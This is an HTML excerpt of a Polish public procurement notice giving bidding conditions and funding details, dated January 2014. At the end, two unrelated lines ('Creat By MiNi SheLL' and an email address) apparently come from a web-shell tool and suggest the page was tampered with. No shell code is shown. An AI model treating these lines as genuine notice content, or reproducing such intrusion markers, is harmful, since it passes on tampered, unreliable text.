<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> 1.	Zamawiający nie dopuszcza składania ofert częściowych.
2.	Zamawiający nie dopuszcza składania ofert wariantowych. 
3.	Zamawiający nie przewiduje udzielenia zamówień uzupełniających.
4.	Zamawiający nie przewiduje zawarcia umowy ramowej.
5.	Zamawiający nie przewiduje wyboru najkorzystniejszej oferty z zastosowaniem aukcji elektronicznej oraz ustanowienia dynamicznego systemu zakupów.
6.	Wszystkie rozliczenia związane z realizacją zamówienia publicznego, którego dotyczy niniejsza SIWZ dokonywane będą w PLN.
7.	Wykonawca zobowiązany jest do wskazania w ofercie (załącznik nr 1) części zamówienia  (zakresu), których wykonanie zamierza powierzyć podwykonawcom. Brak powyższej informacji oznaczać będzie, że całość zamówienia zostanie zrealizowana przez Wykonawcę.
8.	Zamawiający w przedmiotowym postępowaniu nie prowadził dialogu technicznego.
9. Nie dotyczy finansowania projektu/programu ze środków Unii Europejskiej. 10. Data zamieszczenia niniejszego ogłoszenia w Biuletynie Zamówień Publicznych: 14.01.2014r..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com